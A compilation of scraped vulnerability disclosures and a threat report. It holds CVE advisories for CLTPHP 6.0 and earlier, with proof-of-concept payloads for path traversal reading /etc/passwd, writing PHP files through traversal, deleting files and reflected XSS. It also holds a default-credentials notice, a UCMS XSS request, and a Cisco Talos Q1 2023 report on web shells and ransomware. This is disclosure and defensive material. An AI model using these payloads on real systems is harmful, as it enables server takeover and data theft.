CLTPHP <=6.0 is vulnerable to Unrestricted Upload of File with Dangerous Type.

**CLTPHP <= 6.0 Unrestricted Upload of File with Dangerous Type 1****Description**

    The system client does not handle these parameters correctly, resulting in an Unrestricted Upload of File with Dangerous Type.
    

**Vendor Homepage**

    https://gitee.com/chichu/cltopen/
    https://www.cltphp.com/
    

**Author****Proof of Concept**

File:application/admin/controller/Template.php 

Exploiting this vulnerability requires logging into the system.

1.  Try to write 5.php to the static directory, click submit and grab the package.
    
    After visiting 5.php, I found that the code could not be parsedCheck the source code and find that the < is converted to entity code format
    
2.  There are two types of situations
    
    *   CLTPHP = 6.0
        
        We just need to pass random values to override config/app.php to disable the filtering configuration
        
            type=php&file=../../../../config/app&content=123
            
        
        Then pass in phpinfo
        
            type=php&file=../../../app&content=<?php phpinfo();?>
            
        
        Write success
        
    *   CLTPHP < 6.0
        
        just use this payload
        
            POST /index.php/admin/template/insert.html
            
            type=php&file=../../../../filename&content=<?php phpinfo();>

CVE-2023-30266: HuBenVulList/CLTPHP6.0 Unrestricted Upload of File with Dangerous Type 1.md at main · HuBenLab/HuBenVulList

\[CVE ID\]

CVE-2023-30266

\[PRODUCT\]

CLTPHP - <=6.0

\[VERSION\]

CLTPHP - <=6.0

\[PROBLEM TYPE\]

Unrestricted Upload of File with Dangerous Type

\[DESCRIPTION\]

CLTPHP <=6.0 is vulnerable to Unrestricted Upload of File with

CVE-2023-30266: CVE-2023-30266

CLTPHP <=6.0 is vulnerable to Directory Traversal.

\[CVE ID\]

CVE-2023-30265

\[PRODUCT\]

CLTPHP - <=6.0

\[VERSION\]

CLTPHP - <=6.0

\[PROBLEM TYPE\]

Directory Traversal

\[DESCRIPTION\]

CLTPHP <=6.0 is vulnerable to Directory Traversal

CVE-2023-30265: CVE-2023-30265

Permalink

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Go to file

*   Go to file

*   Copy path
*   Copy permalink

Cannot retrieve contributors at this time

**CLTPHP <= 6.0 Path Traversal****Description**

    The system client did not handle the parameters correctly, resulting in path traversal.
    

**Vendor Homepage**

    https://gitee.com/chichu/cltopen/
    https://www.cltphp.com/
    

**Author****Proof of Concept**

File:application/admin/controller/Template.php 

Exploiting this vulnerability requires logging into the system.

payload:

    admin/template/edit?file=../../../../../../../../../../etc/passwd&type=../

CVE-2023-30265: HuBenVulList/CLTPHP6.0 Path Traversal.md at main · HuBenLab/HuBenVulList

CLTPHP <=6.0 is vulnerable to Improper Input Validation via application/admin/controller/Template.php.

\[CVE ID\]

CVE-2023-30269

\[PRODUCT\]

CLTPHP - <=6.0

\[VERSION\]

CLTPHP - <=6.0

\[PROBLEM TYPE\]

Improper Input Validation

\[DESCRIPTION\]

CLTPHP <=6.0 is vulnerable to Improper Input Validation via

CVE-2023-30269: CVE-2023-30269

**CLTPHP <= 6.0 Improper Input Validation 1****Description**

    The system client did not handle the parameters correctly, resulting in arbitrary file deletion.
    

**Vendor Homepage**

    https://gitee.com/chichu/cltopen/
    https://www.cltphp.com/
    

**Author****Proof of Concept**

File:application/admin/controller/Template.php 

Exploiting this vulnerability requires logging into the system.

payload:

    admin/template/imgDel 
    
    post：folder=../../../../../../../../../&filename=tmp/123
    

The method of writing output has been executed, but because the images directory does not exist by default, the exploit will fail. If the images directory exists, it can be exploited normally (linux platform). If it is in windows is not affected by the images directory, you can use the vulnerability normally

CVE-2023-30269: HuBenVulList/CLTPHP6.0 Improper Input Validation 1.md at main · HuBenLab/HuBenVulList

CLTPHP <=6.0 is vulnerable to Cross Site Scripting (XSS) via application/home/controller/Changyan.php.

Permalink

Cannot retrieve contributors at this time

**CLTPHP <= 6.0 Reflected cross-site scripting(XSS)****Description**

    The system client does not handle GET parameters correctly, resulting in reflected cross-site scripting (XSS).
    

**Vendor Homepage**

    https://gitee.com/chichu/cltopen/
    https://www.cltphp.com/
    

**Author****Proof of Concept**

File:application/home/controller/Changyan.php 

payload:

    ?callback=<script>alert(%27Vulnerable%27);</script>

CVE-2023-30267: HuBenVulList/CLTPHP6.0 Reflected cross-site scripting(XSS).md at main · HuBenLab/HuBenVulList

An issue was discovered in Fighting Cock Information System 1.0, which uses default credentials, but does not force nor prompt the administrators to change the credentials.

\> \[VulnerabilityType Other\]

\>> Default Credentials

\---------------------------------------------------------------

\> \[Affected Component\]

\>> Login page

\---------------------------------------------------------------

\> \[Attack Type\]

\>> Remote

\---------------------------------------------------------------

\> \[Impact Escalation of Privileges\]

\>> true

\---------------------------------------------------------------

\> \[Attack Vectors\]

\>> Admin:Admin credentials posted publicly and does not

\>> force a change upon login

\---------------------------------------------------------------

\> \[Discoverer\]

\>> Hopscotch, Chez, Killa\_Crab

\---------------------------------------------------------------

\> \[Reference\]

\>> https://www.sourcecodester.com/php/12824/fighting-cock-information-system.html

\---------------------------------------------------------------

\> \[Vendor of Product\]

\>> FIghting Cock Information System, crhisjelo

\---------------------------------------------------------------

\> \[Affected Product Code Base\]

\>> Fighting Cock Information System All versions

\---------------------------------------------------------------

CVE-2022-39989: CVE-2022-39989

In 45 percent of engagements, attackers exploited public-facing applications to establish initial access, a significant increase from 15 percent the previous quarter.

Wednesday, April 26, 2023 08:04

**Web shell usage spikes in Q1 compared to previous quarters, correlating with higher instances of exploitation of public-facing applications.**

In a novel increase compared to previous quarters, Cisco Talos Incident Response (Talos IR) reports that web shells were the most-observed threat in the first quarter of 2023, comprising nearly a fourth of the incidents Talos IR engaged in. The functionality of these web shells and the specific vulnerabilities and weaknesses in the platforms they targeted varied. Although each web shell had its own sets of basic functions, when there were multiple web shells present in a single engagement, threat actors chained them together to provide a more flexible toolkit for spreading access across the network. This demonstrates the skills actors have in combining multiple means of accesses and tools and increases the liklihood that they will be able to deploy additional malware or obtain sensitive and private information.

Ransomware made up a smaller portion of threats observed this quarter than in the past, from 20% to around 10%. Given that Talos IR observed a recent surge of ransomware incidents at the end of the quarter that did not close off, this decrease does not necessarily signify a decline in general ransomware activity as much as it is a reflection of activity seen against Talos IR’s customer base. However, ransomware and pre-ransomware incidents combined made up more than 20 percent of threats observed. While it can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place, many of the pre-ransomware engagements featured activity associated with prominent ransomware groups, such as Vice Society. We note that in this quarter, particularly in an aforementioned Vice Society engagement, swift action from defenders at victim organizations as well as Talos IR helped mitigate malicious activity before encryption could occur.

This quarter also featured previously seen commodity loaders, such as Qakbot. In engagements this quarter, Qakbot leveraged malicious OneNote documents, consistent with an uptick in various malware distributing weaponized Microsoft Office OneNote attachments. This is evidence of an ongoing trend of threat actors experimenting with file types that do not rely on macros to deliver malicious payloads following Microsoft’s move to start disabling macros by default in its applications in July 2022.

In 45 percent of engagements, attackers exploited public-facing applications to establish initial access, a significant increase from 15 percent the previous quarter. In many of these engagements, web shell usage contributed to this uptick where adversaries were attempting to compromise web-based servers exposed to the internet.

**Targeting**

Health care and public health was the most targeted vertical this quarter, closely followed by the retail and trade, real estate and food services/accommodation sectors, including hospitality.

**Web shell usage spike, featuring activity from FIN13**

Since January 2023, Talos IR observed an increase in web shell usage from 6% of all threats last quarter to now comprising nearly 25% of all threats. Web shells are malicious scripts that enable threat actors to compromise web-based servers exposed to the internet. This quarter, Talos observed threat actors using publicly available or modified web shells coded in various languages, including PHP, ASP.NET and Perl. After leveraging web shells to establish a foothold and gain persistent access to a system, adversaries remotely executed arbitrary code or commands, moved laterally within the network, or delivered additional malicious payloads. In many of these web shell incidents, adversaries relied heavily on web shell code sourced from publicly available GitHub repositories. This finding is also in line with a trend observed from Talos IR engagements from July to September 2022 (Q3 2022), where adversaries used a variety of open-source tools and scripts hosted on GitHub repositories to support operations across multiple stages of the attack lifecycle.

In one cluster of web shell activity, Talos observed targeting patterns and tactics, techniques and procedures (TTPs) potentially associated with the FIN13 cybercriminal threat actor, a significant finding in Talos IR engagements given FIN13’s targeted behavior. The web shells with known FIN13 TTPs have varying levels of functionality which include allowing queries to Microsoft SQL (MS-SQL) instances, creating reverse shell connection(s) to external IP addresses, and executing PHP scripts which can be used as a proxy to connect to other services. Consistent with public reporting on FIN13, Talos IR observed a PHP-based web shell (“404.php”) that took an IP or DNS entry and a port and attempted to create a proxy connection. The second web shell (“ms3.aspx”) was Windows-based and allowed SQL connections to an internal server and, if successful, results would be rendered in the browser. The third was another PHP-based web shell (“re.php”) that conducted port scans and created an outbound socket to respond/exfiltrate data to the attacker. This specific web shell contained a hardcoded IP address which resolved to cloud service provider DigitalOcean. The final web shell (“tx.asp”) was a Windows-based web shell that used “wscript.shell” and exec() to run commands rendered to the screen via an HTML document. While each web shell on its own had basic functionality, by chaining them together, the actor created a flexible toolkit for spreading their access across the network, while providing a proxy for exfiltrating sensitive data.

While the exact reason for this quarter’s increased appearance of web shells is unknown, their recent increased popularity may potentially be related to the ease of obtaining their code through open-source repositories. The availability of and easy access to open-source web shell code, paired with systems that may be publicly exposed or have poorly managed patching, make the use of web shells a lucrative option.

**Ransomware**

Ransomware made up a much smaller portion of threats this quarter, from 20% of threats to 10%. Looking ahead, there was a recent spike in ransomware engagements which we expect to level out again next quarter. Combined, ransomware and pre-ransomware incidents made up over 20 percent of threats observed.

In a Phobos ransomware engagement, a threat that Talos IR has responded to since 2020, the initial access likely involved remote desktop protocol (RDP). The adversary deployed a file named “mimidrv.sys," which is a signed Windows kernel mode software driver meant to be used with the Mimikatz executable. Talos IR also identified seven startup items that included downloading the ransomware executable, “Fast.exe.” This is a common persistence technique that followed activity where the adversary made modifications to the registry on the customer’s Amazon Relational Database Service (RDS) server. Upon encryption, attackers encrypted the files, appending them with the “.faust” extension and dropped a ransom note on the targeted systems.

This quarter also featured the Daixin ransomware, a newer ransomware-as-a-service (RaaS) family that Talos IR had never seen before in an engagement. Daixin, which first emerged in June 2022, typically involves affiliates gaining access to victim systems through virtual private networks (VPN) servers or by exploiting unpatched vulnerabilities, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA). In a Daixin ransomware engagement, the affiliate modified registry values, mapped network shares, and ran randomly named BAT files as services on the system. Talos IR also identified the Impacket toolset, a collection of Python classes for working with different network protocols, and a PowerShell script loading a Cobalt Strike payload which subsequently launched a Cobalt Strike shellcode listening on port 4444.

We assess that the recent law enforcement efforts to disrupt ransomware actors will create space for new groups to emerge, consistent with a pattern that has been ongoing for years. In January 2023, the U.S. Department of Justice announced a months-long disruption campaign against the Hive ransomware group. The FBI, along with foreign law enforcement partners, seized Hive servers after entering its networks and capturing keys to decrypt its software, effectively disrupting operations. We have not observed Hive ransomware in Talos IR engagements since August 2022, a likely indication that Hive operations have ceased while former members possibly look to join other groups or rebrand under new names.

**Malicious OneNote documents continue to be leveraged in engagements this quarter**

The Qakbot commodity loader was observed across engagements this quarter leveraging ZIP files containing malicious OneNote documents, consistent with endpoint telemetry and public reporting on threats leveraging OneNote documents in phishing emails starting at the end of 2022 and early 2023. In one Qakbot engagement, a ZIP file ("Inv\_02\_02\_#3.zip") was detected as Qakbot and contained a malicious OneNote document which attempted to lure a user to click “open” containing a malicious embedded URL.

While Talos IR did not respond to any Emotet incidents this quarter, Emotet reemerged in March 2023, resuming its spam operations after a months-long hiatus. In a relatively short period, Emotet modified its infection chain several times to maximize the likelihood of successfully infecting victims. By mid-March, Emotet had switched to distributing malicious OneNote documents, highlighting the ways in which threat actors will continue to identify and quickly implement updated delivery methods to infect victims.

**Initial vectors**

This quarter featured 45 percent of engagements where attackers exploited public-facing applications to establish initial access, a significant increase from 15 percent the previous quarter. In many of these engagements, web shell usage contributed to this uptick where adversaries were attempting to compromise web-based servers exposed to the internet. Valid accounts and/or accounts with weak passwords or single-factor authentication also helped facilitate initial access where an adversary was leveraging compromised credentials.

Several known vulnerabilities contributed to adversaries gaining initial access via exploiting public-facing applications. In one incident, Talos IR identified activity consistent with exploitation of the WordPress vulnerability, tracked as CVE-2021-24867, in AccessPress Plugin and Theme. As a result, Talos IR identified approximately 20 different web shells and/or website defacements, likely from multiple threat actors identifying and exploiting this older flaw.

In another web shell engagement, Talos IR identified a vulnerable version of Magento (Adobe Commerce) version 2.4.2 that was operating in the Kubernetes deployment at the time of exploitation. Talos IR identified a total of nine known vulnerabilities for this version of the software, not including extensions. Talos IR recommends upgrading all instances of Magento to the latest available version, and routinely checking for vulnerable outdated extension versions that need patching or removed completely to reduce the available attack surface.

**Security weaknesses**

The lack of multi-factor authentication (MFA) remains one of the biggest impediments for enterprise security. Nearly 30 percent of engagements involved organizations that either had no MFA or only had it enabled on a handful of accounts and critical services. Talos IR frequently observes ransomware and phishing incidents that could have been prevented if MFA had been properly enabled on critical services, such as endpoint detection response (EDR) solutions or VPNs. To help minimize initial access vectors, Talos IR recommends disabling VPN access for all accounts that are not using MFA.

The increase in web shell engagements highlights the need for more vigilance in helping to prevent web shells. Talos provides the following recommendations:

*   Routinely update and patch all software and operating systems to identify and remediate vulnerabilities or misconfigurations in web applications and web servers.
*   In addition to patching, perform general system hardening, including removing services or protocols where they are unnecessary and being aware of all systems exposed directly to the internet.
*   Disable unnecessary php functions in your “php.ini”, such as eval(), exec(), peopen(), proc\_open() and passthru().
*   Frequently audit and review logs from web servers for unusual or anomalous activity.

**Top-observed MITRE ATT&CK techniques**

The table below represents the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note, this is not an exhaustive list.

Key findings from the MITRE ATT&CK framework include:

*   Exploitation of public-facing applications was the top observed initial access technique, with the increased web shell activity likely contributing to this significant observation.
*   PowerShell is routinely used by adversaries to support a multitude of threats. We continued to observe high usage of PowerShell, in addition to a number of other scripting languages, including Python, Unix shell, and Windows command shell, which enabled web shell execution.
*   The open source red-teaming security toolkit Mimikatz was used to support nearly 60 percent of ransomware and pre-ransomware engagements this quarter. Consistently observed across previous quarters, Mimikatz is a widely used post-exploitation tool used to steal login IDs, passwords, and authentication tokens from compromised Windows systems.

Tactic 

Technique 

Example 

Initial Access (TA0001) 

T1190 Exploit Public-Facing Application  

Attackers successfully exploited a vulnerable application that was publicly exposed to the internet 

Reconnaissance (TA0043) 

T1592 Gather Victim Host Information 

Text file contains details about host 

Persistence (TA0003) 

T1505.003 Server Software Component: Web Shell  

Adversaries deployed web shells against web-based servers 

Execution (TA0002) 

T1059.001 Command and Scripting Interpreter: PowerShell  

Executes PowerShell code to retrieve information about the client's Active Directory environment 

Discovery (TA0007) 

T1046 Network Service Scanning   

Use a network or port scanner utility  

Credential Access (TA0006) 

T1003 OS Credential Dumping 

Deploy Mimikatz and publicly available password lookup utilities 

Privilege Escalation (TA0004)  

1484 Domain Policy Modification

Modify GPOs to execute malicious files  

Lateral Movement (TA0008) 

T1021.001 Remote Desktop Protocol  

Adversary made attempts to move laterally using Windows Remote Desktop 

Defense Evasion (TA0005) 

T1027 Obfuscated Files or Information 

Use base64-encoded PowerShell scripts 

Command and Control (TA0011) 

T1105 Ingress Tool Transfer  

Adversaries transfer/download tools from an external system 

Impact (TA0040) 

T1486 Data Encrypted for Impact  

Deploy Hive ransomware and encrypt critical systems 

Exfiltration (TA0010) 

T1567 Exfiltration Over Web Service 

Use legitimate external web service to  system information  

Collection (TA0009) 

T1560.001 Archive Collected Data 

Adversary leveraged xcopy on Windows to copy files  

Software/Tool 

S0002 Mimikatz 

Use Mimikatz to obtain account logins and passwords

Quarterly Report: Incident Response Trends in Q1 2023

A vulnerability was found in UCMS 1.6.0. It has been classified as problematic. This affects an unknown part of the file saddpost.php of the component Column Configuration. The manipulation of the argument strorder leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227481 was assigned to this vulnerability.

Vulnerability description： UCMS 1.6 was discovered to contain a cross-site scripting (XSS) vulnerability via the "Column configuration"(栏目配置)-"Variable name module"(变量名模块) under the Site Management page.

Vulnerability recurrence： The filtering of $strorder is not strict in the adding method of the file \ucms_1.6\ucms\sadmin\saddpost

    POST /ucms_1.6/ucms/index.php?do=sadmin_saddpost HTTP/1.1
    Host: 10.211.55.7
    Proxy-Connection: keep-alive
    Content-Length: 531
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://10.211.55.7
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.211.55.7/ucms_1.6/ucms/index.php?do=install
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: admin_5a298d=admin; psw_5a298d=11588e274d6c1b23f3997fb435480270; token_5a298d=842df413; PHPSESSID=o3ppmlrbn6epa7v9otb6qlp0b5
    
    strcid=0&uuu_token=842df413&strname%5B%5D=%E7%AB%99%E7%82%B9%E6%A0%87%E9%A2%98&inputkind%5B%5D=1&strorder%5B%5D=5&strname%5B%5D=%E5%85%B3%E9%94%AE%E8%AF%8D&inputkind%5B%5D=1&strorder%5B%5D=%E6%8F%8F%E8%BF%B0%3Cstyle+onload%3Dalert%281%29%3E &strname%5B%5D=%E6%8F%8F%E8%BF%B0%3Cstyle+onload%3Dalert%281%29%3E&inputkind%5B%5D=2&strorder%5B%5D=15&strname%5B%5D=logo%E5%9B%BE%E7%89%87&inputkind%5B%5D=5&strorder%5B%5D=20&strname%5B%5D=%E5%A4%87%E6%A1%88%E5%8F%B7&inputkind%5B%5D=1&strorder%5B%5D=25&strname%5B%5D=%E7%BB%9F%E8%AE%A1%E4%BB%A3%E7%A0%81&inputkind%5B%5D=2&strorder%5B%5D=30

Tag

#php